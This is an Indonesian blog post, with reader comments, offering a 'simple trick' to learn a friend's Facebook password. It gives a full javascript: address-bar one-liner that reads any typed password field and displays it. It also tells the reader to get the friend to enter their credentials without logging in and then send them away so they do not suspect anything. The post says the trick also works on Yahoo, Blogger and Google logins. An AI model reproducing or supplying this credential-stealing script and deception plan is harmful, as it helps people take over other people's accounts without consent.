Welcome to my blog
go to my homepage
Go to homepage

Trik Simple Mengetahui Pasword Facebook Orang lain

Pasti Loe pade udah tidak asing lagi dengan jejaring social seperti facebook ama twitter.karena saking terkenalnya banyak orang melakukan berbagai cara untuk mendapatkan akun orang lain,salah satunya adalah mencuri password facebook.Mencuri password itu mudah asalkan kita tahu jalannya(bener nggak?)Tapi sebenarnya tips ini tidak terlalu efisien,tapi pantas sahabat coba untuk mengetahui dengan detil password teman kita,penasaran???ayolah dilanjut.^_^

Cara Mengetahui Password Facebook teman

1.silahkan loe buka facebook
2.untuk melakukan test coba masukkan email dan password dikolom login
(tapi jangan klik login dulu atau Jangan nter dulu)

mengetahui password facebook teman
3.Copy kode dibawah ini ke addres bar browser
( Tempat Tulis www.facebook.com itu loh )
lalu tekan Enter :
javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == "password") {a += document.forms[i].elements[j].value; } } } alert(a);

misalkan gagal download javascript tersebut disini

maka password teman sahabat akan muncul seperti gambar dibawah ini.
Cara mengetahui password facebook teman
(contoh gambar yang menampilkan password teman.klik untuk memperbesar)

Agar trik ini berhasil,ajaklah teman untuk login di facebook tapi jangan klik tombol login dulu.Suruhlah dy untuk beli makan atau minuman,atau apalah terserah sahabat asal jangan sampe dy curiga.ok^_^

CARA INI TIDAK HANYA BERLAKU UNTUK FACEBOOK SAJA
TAPI JUGA BERLAKU UNTUK LAINNYA
MISALKAN LOGIN YAHOO,LOGIN BLOGGER,LOGIN GOOGLE dan lainya

7 komentar:

joe mengatakan...

om minacoo tanya donk . judul dan pincipta lagu di ebb minacoo siapa yaa ?? pingin tahu coz lagunya enak . trims sblumnya

Anonim mengatakan...

gag ada cara yg simple...
misalnya ane tau alamat dia aja...

Ajuna mengatakan...

kok g ada nampak kk minaco

Ajuna mengatakan...

g ada npa password nya bg minaco

cuma di BILANG OK AJA di situ gimna tuh gi mna cara yg laen cara nya biar dapet password nya trus kk

Anonim mengatakan...

salam jumpa om, anda memang luarbiasa sekali memberi masukan yg berharga sekali lagi terima kasih Om

Anonim mengatakan...

om judul lagu backsound nya apa sih,,,
kasih tau dong,,enak tu lagunya..

BlackSuck mengatakan...

Oom... ne ma sma ajja ama seepass (seepassword) dOnk

Posting Komentar

Ganti warna tulisan